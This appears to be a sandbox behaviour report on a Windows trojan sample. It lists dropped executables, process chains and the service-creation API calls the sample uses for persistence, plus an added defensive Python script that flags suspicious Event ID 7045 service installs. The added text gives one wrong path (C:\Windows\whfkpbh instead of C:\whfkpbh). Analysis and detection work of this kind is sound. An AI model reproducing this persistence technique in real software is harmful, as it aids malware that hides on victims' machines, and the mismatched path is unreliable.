Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 5_2_00A50D80
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 5_2_00A555E0
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 5_2_00A4E1C0
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 5_2_00A4A930
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 5_2_00A65930
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 5_2_00A4F160
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 5_2_00A3E550
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 5_2_00A54EA0
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 5_2_00A522A0
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 5_2_00A60A90
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 5_2_00A566E7
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 5_2_00A60220
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 5_2_00A56A7B
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 5_2_00A497B0
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 5_2_00A5E726
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 5_2_00A3F330
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 5_2_00A59B00
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 5_2_00A3D760
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 6_2_00147A04
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 6_2_00155200
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 6_2_00141490
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 6_2_0015A0A6
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 6_2_001530F0
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 6_2_0015A930
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 6_2_00175930
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 6_2_0014E550
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 6_2_0015F160
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 6_2_00160D80
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 6_2_0015E1C0
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 6_2_001655E0
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 6_2_00170220
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 6_2_00166A7B
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 6_2_00170A90
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 6_2_00164EA0
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 6_2_001622A0
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 6_2_001666E7
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 6_2_00169B00
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 6_2_0016E70C
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 6_2_0014F330
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 6_2_0014D760
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 6_2_001597B0
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 11_2_0015A930
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 11_2_00160D80
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 11_2_00147A04
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 11_2_00155200
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 11_2_001622A0
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 11_2_00169B00
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 11_2_00141490
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 11_2_0015A0A6
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 11_2_001530F0
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 11_2_00175930
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 11_2_0014E550
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 11_2_0015F160
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 11_2_0015E1C0
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 11_2_001655E0
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 11_2_00170220
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 11_2_00166A7B
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 11_2_00170A90
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 11_2_00164EA0
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 11_2_001666E7
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 11_2_0016E70C
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 11_2_0014F330
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 11_2_0014D760
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 11_2_001597B0
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 12_2_00CD7A04
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 12_2_00CE5200
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 12_2_00CE30F0
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 12_2_00CD1490
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 12_2_00CEA0A6
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 12_2_00CEE1C0
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 12_2_00CF55E0
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 12_2_00CF0D80
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 12_2_00CDE550
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 12_2_00CEF160
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 12_2_00D05930
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 12_2_00CEA930
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 12_2_00CF66E7
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 12_2_00D00A90
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 12_2_00CF4EA0
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 12_2_00CF22A0
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 12_2_00CF6A7B
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 12_2_00D00220
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 12_2_00CE97B0
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 12_2_00CDD760
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 12_2_00CFE70C
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 12_2_00CF9B00
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 12_2_00CDF330
Source: mtuXDnH1Di.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine | Classification label: mal88.troj.winEXE@14/5@215/12
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe | Code function: 0_2_00ED0500 | OpenSCManagerA,CreateServiceA,ChangeServiceConfig2A,StartServiceA,CloseServiceHandle,OpenServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe | Code function: 2_2_009E0500 | OpenSCManagerA,CreateServiceA,ChangeServiceConfig2A,StartServiceA,CloseServiceHandle,OpenServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 3_2_00150500 | OpenSCManagerA,CreateServiceA,ChangeServiceConfig2A,StartServiceA,CloseServiceHandle,OpenServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 5_2_00A40500 | OpenSCManagerA,CreateServiceA,ChangeServiceConfig2A,StartServiceA,CloseServiceHandle,OpenServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 6_2_00150500 | OpenSCManagerA,CreateServiceA,ChangeServiceConfig2A,StartServiceA,CloseServiceHandle,OpenServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 11_2_00150500 | OpenSCManagerA,CreateServiceA,ChangeServiceConfig2A,StartServiceA,CloseServiceHandle,OpenServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 12_2_00CE0500 | OpenSCManagerA,CreateServiceA,ChangeServiceConfig2A,StartServiceA,CloseServiceHandle,OpenServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe | Code function: 0_2_00ED2120 | CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe | Code function: 0_2_00ED0500 | OpenSCManagerA,CreateServiceA,ChangeServiceConfig2A,StartServiceA,CloseServiceHandle,OpenServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe | Code function: 0_2_00ECC660 | StartServiceCtrlDispatcherA
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe | Code function: 2_2_009DC660 | StartServiceCtrlDispatcherA
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 3_2_0014C660 | StartServiceCtrlDispatcherA
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 5_2_00A3C660 | StartServiceCtrlDispatcherA
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 6_2_0014C660 | StartServiceCtrlDispatcherA
Source: C:\whfkpbh\idtpqzltyfy.exe | Code function: 11_2_0014C660 | StartServiceCtrlDispatcherA
Source: C:\whfkpbh\amdrhfskpcu.exe | Code function: 12_2_00CDC660 | StartServiceCtrlDispatcherA
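The API chain above (OpenSCManagerA, CreateServiceA, ChangeServiceConfig2A, StartServiceA, then OpenServiceA and a second StartServiceA) is how each dropped binary registers and starts itself as a Windows service, and StartServiceCtrlDispatcherA is the matching service entry point. Every such registration is written to the System event log as Event ID 7045 ("A service was installed in the system") together with the service's ImagePath, which is the cheapest place to catch it after the fact. The Python below is an added example, not part of the Joe Sandbox report and not code from the sample: it scans 7045 records for services whose command line references an executable outside the directories a service binary is normally expected to live in. The event records are constructed; the first ImagePath is the command line the process tree in this report shows for amdrhfskpcu.exe, but its service name (placeholder_svc), the other two services and the TRUSTED_ROOTS list are this example's own assumptions, as are the function names.

```python
"""Flag service installs whose command line points outside trusted directories.

Added example, not part of the Joe Sandbox report or the sample. The records
below are constructed in the shape of Windows System log Event ID 7045; the
first ImagePath is the command line the report's process tree shows for
amdrhfskpcu.exe, everything else (service names, other paths, trusted roots)
is an assumption made for the example.
"""
import re

# Directories a service binary is normally expected to live under. This list
# is an assumption for the example; adjust it to your estate.
TRUSTED_ROOTS = (
    "c:\\windows\\system32\\",
    "c:\\windows\\syswow64\\",
    "c:\\program files\\",
    "c:\\program files (x86)\\",
)

# Constructed sample events; dicts stand in for parsed EVTX/XML fields.
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "placeholder_svc",  # name is assumed
     "ImagePath": r'C:\whfkpbh\amdrhfskpcu.exe wudcwbel2zfb "c:\whfkpbh\idtpqzltyfy.exe"',
     "StartType": "auto start", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "W32Time",
     "ImagePath": r"%SystemRoot%\system32\svchost.exe -k LocalService -s W32Time",
     "StartType": "auto start", "AccountName": r"NT AUTHORITY\LocalService"},
    {"EventID": 7045, "ServiceName": "ExampleAgent",
     "ImagePath": r'"C:\Program Files\Example Vendor\agent.exe" --service',
     "StartType": "auto start", "AccountName": "LocalSystem"},
    {"EventID": 7036, "ServiceName": "W32Time", "ImagePath": ""},  # state change, not an install
]

# A quoted path (may contain spaces) or an unquoted run of non-space characters,
# either way ending in .exe; the service's own binary and any launched binary.
EXE_RE = re.compile(r'"([^"]+\.exe)"|(\S+\.exe)', re.IGNORECASE)


def executables_in(image_path: str) -> list[str]:
    """Every .exe referenced on a service command line, quoted or not, lower-cased."""
    return [(quoted or bare).lower() for quoted, bare in EXE_RE.findall(image_path)]


def is_trusted(path: str) -> bool:
    """True when the case-folded, %SystemRoot%-expanded path sits under a trusted root."""
    path = path.lower().replace("%systemroot%", "c:\\windows", 1)  # assumes C:\Windows
    return path.startswith(TRUSTED_ROOTS)


def suspicious_service_installs(events) -> list[tuple[str, str]]:
    """(service name, executable) for each 7045 whose command line references a
    binary outside TRUSTED_ROOTS. A launcher that points at a second binary, as
    the dropped service does here, yields one hit per offending executable."""
    hits = []
    for event in events:
        if event.get("EventID") != 7045:
            continue
        for exe in executables_in(event["ImagePath"]):
            if not is_trusted(exe):
                hits.append((event["ServiceName"], exe))
    return hits


if __name__ == "__main__":
    for name, exe in suspicious_service_installs(SAMPLE_EVENTS):
        print(f"suspicious service install: {name} -> {exe}")
```

On the constructed input the dropped service produces two hits, one for amdrhfskpcu.exe and one for the idtpqzltyfy.exe it is told to launch, while the svchost-hosted W32Time and the Program Files agent pass. A directory-root check like this is deliberately coarse; pair it with the 7045 AccountName (LocalSystem here) and with the file-creation events under C:\Windows\whfkpbh\ that the report lists to get a higher-confidence alert.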
Source: C:\whfkpbh\amdrhfskpcu.exe | Mutant created: NULL
Source: mtuXDnH1Di.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: mtuXDnH1Di.exe | ReversingLabs: Detection: 92%
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe | File read: C:\Users\user\Desktop\mtuXDnH1Di.exe
Source: unknown | Process created: C:\Users\user\Desktop\mtuXDnH1Di.exe "C:\Users\user\Desktop\mtuXDnH1Di.exe"
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe | Process created: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe "C:\whfkpbh\qbf30bzbv7f7qnhdav.exe"
Source: unknown | Process created: C:\whfkpbh\idtpqzltyfy.exe C:\whfkpbh\idtpqzltyfy.exe
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -s W32Time
Source: C:\whfkpbh\idtpqzltyfy.exe | Process created: C:\whfkpbh\amdrhfskpcu.exe wudcwbel2zfb "c:\whfkpbh\idtpqzltyfy.exe"
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe | Process created: C:\whfkpbh\idtpqzltyfy.exe "C:\whfkpbh\idtpqzltyfy.exe"
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Source: C:\whfkpbh\amdrhfskpcu.exe | Process created: C:\whfkpbh\idtpqzltyfy.exe "c:\whfkpbh\idtpqzltyfy.exe"
Source: C:\whfkpbh\idtpqzltyfy.exe | Process created: C:\whfkpbh\amdrhfskpcu.exe wudcwbel2zfb "c:\whfkpbh\idtpqzltyfy.exe"
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe | Process created: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe "C:\whfkpbh\qbf30bzbv7f7qnhdav.exe"
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe | Process created: C:\whfkpbh\idtpqzltyfy.exe "C:\whfkpbh\idtpqzltyfy.exe"
Source: C:\whfkpbh\idtpqzltyfy.exe | Process created: C:\whfkpbh\amdrhfskpcu.exe wudcwbel2zfb "c:\whfkpbh\idtpqzltyfy.exe"
Source: C:\whfkpbh\amdrhfskpcu.exe | Process created: C:\whfkpbh\idtpqzltyfy.exe "c:\whfkpbh\idtpqzltyfy.exe"
Source: C:\whfkpbh\idtpqzltyfy.exe | Process created: C:\whfkpbh\amdrhfskpcu.exe wudcwbel2zfb "c:\whfkpbh\idtpqzltyfy.exe"
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe | Section loaded: wintypes.dll
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe | Section loaded: apphelp.dll
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe | Section loaded: iphlpapi.dll
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe | Section loaded: dhcpcsvc.dll
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe | Section loaded: cryptsp.dll
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe | Section loaded: rsaenh.dll
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe | Section loaded: sspicli.dll
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe | Section loaded: userenv.dll
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe | Section loaded: profapi.dll
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe | Section loaded: ntmarta.dll
Source: C:\whfkpbh\idtpqzltyfy.exe | Section loaded: apphelp.dll
Source: C:\whfkpbh\idtpqzltyfy.exe | Section loaded: iphlpapi.dll
Source: C:\whfkpbh\idtpqzltyfy.exe | Section loaded: dhcpcsvc.dll
Source: C:\whfkpbh\idtpqzltyfy.exe | Section loaded: cryptsp.dll
Source: C:\whfkpbh\idtpqzltyfy.exe | Section loaded: rsaenh.dll
Source: C:\whfkpbh\idtpqzltyfy.exe | Section loaded: sspicli.dll
Source: C:\whfkpbh\idtpqzltyfy.exe | Section loaded: profapi.dll
Source: C:\whfkpbh\idtpqzltyfy.exe | Section loaded: ntmarta.dll
Source: C:\whfkpbh\idtpqzltyfy.exe | Section loaded: mswsock.dll
Source: C:\whfkpbh\idtpqzltyfy.exe | Section loaded: napinsp.dll
Source: C:\whfkpbh\idtpqzltyfy.exe | Section loaded: pnrpnsp.dll
Source: C:\whfkpbh\idtpqzltyfy.exe | Section loaded: wshbth.dll
Source: C:\whfkpbh\idtpqzltyfy.exe | Section loaded: nlaapi.dll
Source: C:\whfkpbh\idtpqzltyfy.exe | Section loaded: dnsapi.dll
Source: C:\whfkpbh\idtpqzltyfy.exe | Section loaded: winrnr.dll
Source: C:\whfkpbh\idtpqzltyfy.exe | Section loaded: rasadhlp.dll
Source: C:\whfkpbh\idtpqzltyfy.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: w32time.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: logoncli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: vmictimeprovider.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
Source: C:\whfkpbh\amdrhfskpcu.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: licensemanagersvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: licensemanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: clipc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
Source: C:\whfkpbh\idtpqzltyfy.exe | Section loaded: iphlpapi.dll
Source: C:\whfkpbh\idtpqzltyfy.exe | Section loaded: dhcpcsvc.dll
Source: C:\whfkpbh\idtpqzltyfy.exe | Section loaded: cryptsp.dll
Source: C:\whfkpbh\idtpqzltyfy.exe | Section loaded: rsaenh.dll
Source: C:\whfkpbh\idtpqzltyfy.exe | Section loaded: sspicli.dll
Source: C:\whfkpbh\idtpqzltyfy.exe | Section loaded: profapi.dll
Source: C:\whfkpbh\idtpqzltyfy.exe | Section loaded: ntmarta.dll
Source: C:\whfkpbh\idtpqzltyfy.exe | Section loaded: mswsock.dll
Source: C:\whfkpbh\idtpqzltyfy.exe | Section loaded: napinsp.dll
Source: C:\whfkpbh\idtpqzltyfy.exe | Section loaded: pnrpnsp.dll
Source: C:\whfkpbh\idtpqzltyfy.exe | Section loaded: wshbth.dll
Source: C:\whfkpbh\idtpqzltyfy.exe | Section loaded: nlaapi.dll
Source: C:\whfkpbh\idtpqzltyfy.exe | Section loaded: dnsapi.dll
Source: C:\whfkpbh\idtpqzltyfy.exeSection loaded: winrnr.dllJump to behavior
Source: C:\whfkpbh\idtpqzltyfy.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\whfkpbh\idtpqzltyfy.exeSection loaded: rasadhlp.dllJump to behavior
Source: mtuXDnH1Di.exe  Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe  Code function: 0_2_00EDA930 GetProcessHeap,LoadLibraryA,GetProcAddress,FreeLibrary,HeapAlloc,FreeLibrary,HeapFree,HeapAlloc,FreeLibrary,HeapFree,FreeLibrary  0_2_00EDA930
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe  Code function: 0_2_00EEE45B push 00000003h; iretd  0_2_00EEE45F
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe  Code function: 0_2_00EECE6F pushad ; ret  0_2_00EECE70
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe  Code function: 0_2_00EECE6A pushad ; ret  0_2_00EECE6B
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe  Code function: 2_2_009FE45B push 00000003h; iretd  2_2_009FE45F
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe  Code function: 2_2_009FCE6F pushad ; ret  2_2_009FCE70
Source: C:\whfkpbh\idtpqzltyfy.exe  Code function: 3_2_0016E45B push 00000003h; iretd  3_2_0016E45F
Source: C:\whfkpbh\idtpqzltyfy.exe  Code function: 3_2_0016CE6F pushad ; ret  3_2_0016CE70
Source: C:\whfkpbh\idtpqzltyfy.exe  Code function: 3_2_0016CE6A pushad ; ret  3_2_0016CE6B
Source: C:\whfkpbh\amdrhfskpcu.exe  Code function: 5_2_00A5E45B push 00000003h; iretd  5_2_00A5E45F
Source: C:\whfkpbh\amdrhfskpcu.exe  Code function: 5_2_00A5CE6F pushad ; ret  5_2_00A5CE70
Source: C:\whfkpbh\amdrhfskpcu.exe  Code function: 5_2_00A5CE6A pushad ; ret  5_2_00A5CE6B
Source: C:\whfkpbh\idtpqzltyfy.exe  Code function: 6_2_0016E45B push 00000003h; iretd  6_2_0016E45F
Source: C:\whfkpbh\idtpqzltyfy.exe  Code function: 6_2_0016CE6F pushad ; ret  6_2_0016CE70
Source: C:\whfkpbh\idtpqzltyfy.exe  Code function: 6_2_0016CE6A pushad ; ret  6_2_0016CE6B
Source: C:\whfkpbh\idtpqzltyfy.exe  Code function: 11_2_0016E45B push 00000003h; iretd  11_2_0016E45F
Source: C:\whfkpbh\idtpqzltyfy.exe  Code function: 11_2_0016CE6F pushad ; ret  11_2_0016CE70
Source: C:\whfkpbh\idtpqzltyfy.exe  Code function: 11_2_0016CE6A pushad ; ret  11_2_0016CE6B
Source: C:\whfkpbh\amdrhfskpcu.exe  Code function: 12_2_00CFE45B push 00000003h; iretd  12_2_00CFE45F
Source: C:\whfkpbh\amdrhfskpcu.exe  Code function: 12_2_00CFCE6F pushad ; ret  12_2_00CFCE70
Source: C:\whfkpbh\amdrhfskpcu.exe  Code function: 12_2_00CFCE6A pushad ; ret  12_2_00CFCE6B
Source: mtuXDnH1Di.exe  Static PE information: section name: .text entropy: 6.86562473291782
Source: qbf30bzbv7f7qnhdav.exe.0.dr  Static PE information: section name: .text entropy: 6.86562473291782
Source: idtpqzltyfy.exe.2.dr  Static PE information: section name: .text entropy: 6.86562473291782
Source: amdrhfskpcu.exe.3.dr  Static PE information: section name: .text entropy: 6.86562473291782
Source: C:\whfkpbh\idtpqzltyfy.exe  File created: C:\whfkpbh\amdrhfskpcu.exe
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe  File created: C:\whfkpbh\idtpqzltyfy.exe
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe  File created: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe
Source: C:\Windows\System32\svchost.exe  Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\Config
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe  Code function: 0_2_00ED0500 OpenSCManagerA,CreateServiceA,ChangeServiceConfig2A,StartServiceA,CloseServiceHandle,OpenServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle  0_2_00ED0500
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe  Code function: OpenSCManagerA,EnumServicesStatusA,GetLastError,EnumServicesStatusA,CloseServiceHandle  0_2_00ECAF20
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe  Code function: OpenSCManagerA,EnumServicesStatusA,GetLastError,EnumServicesStatusA,CloseServiceHandle  2_2_009DAF20
Source: C:\whfkpbh\idtpqzltyfy.exe  Code function: OpenSCManagerA,EnumServicesStatusA,GetLastError,EnumServicesStatusA,CloseServiceHandle  3_2_0014AF20
Source: C:\whfkpbh\amdrhfskpcu.exe  Code function: OpenSCManagerA,EnumServicesStatusA,GetLastError,EnumServicesStatusA,CloseServiceHandle  5_2_00A3AF20
Source: C:\whfkpbh\idtpqzltyfy.exe  Code function: OpenSCManagerA,EnumServicesStatusA,GetLastError,EnumServicesStatusA,CloseServiceHandle  6_2_0014AF20
Source: C:\whfkpbh\idtpqzltyfy.exe  Code function: OpenSCManagerA,EnumServicesStatusA,GetLastError,EnumServicesStatusA,CloseServiceHandle  11_2_0014AF20
Source: C:\whfkpbh\amdrhfskpcu.exe  Code function: OpenSCManagerA,EnumServicesStatusA,GetLastError,EnumServicesStatusA,CloseServiceHandle  12_2_00CDAF20
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe  Code function: GetProcessHeap,LoadLibraryA,GetProcAddress,FreeLibrary,HeapAlloc,FreeLibrary,GetAdaptersInfo,HeapFree,HeapAlloc,FreeLibrary,GetAdaptersInfo,HeapFree,FreeLibrary  2_2_009EA930
Source: C:\whfkpbh\idtpqzltyfy.exe  Code function: GetProcessHeap,LoadLibraryA,GetProcAddress,FreeLibrary,HeapAlloc,FreeLibrary,GetAdaptersInfo,HeapFree,HeapAlloc,FreeLibrary,GetAdaptersInfo,HeapFree,FreeLibrary  3_2_0015A930
Source: C:\whfkpbh\idtpqzltyfy.exe  Code function: GetProcessHeap,LoadLibraryA,GetProcAddress,FreeLibrary,HeapAlloc,FreeLibrary,GetAdaptersInfo,HeapFree,HeapAlloc,FreeLibrary,GetAdaptersInfo,HeapFree,FreeLibrary  11_2_0015A930
Source: C:\whfkpbh\amdrhfskpcu.exe  Window / User API: threadDelayed 656
Source: C:\whfkpbh\amdrhfskpcu.exe  Window / User API: threadDelayed 1220
Source: C:\whfkpbh\idtpqzltyfy.exe  Window / User API: threadDelayed 365
Source: C:\whfkpbh\qbf30bzbv7f7qnhdav.exe  Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)  graph_2-11326
Source: C:\Users\user\Desktop\mtuXDnH1Di.exe  Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)  graph_0-11289
Source: C:\whfkpbh\amdrhfskpcu.exe  Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)  graph_5-11374
Source: C:\whfkpbh\idtpqzltyfy.exe  Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)  graph_3-11264
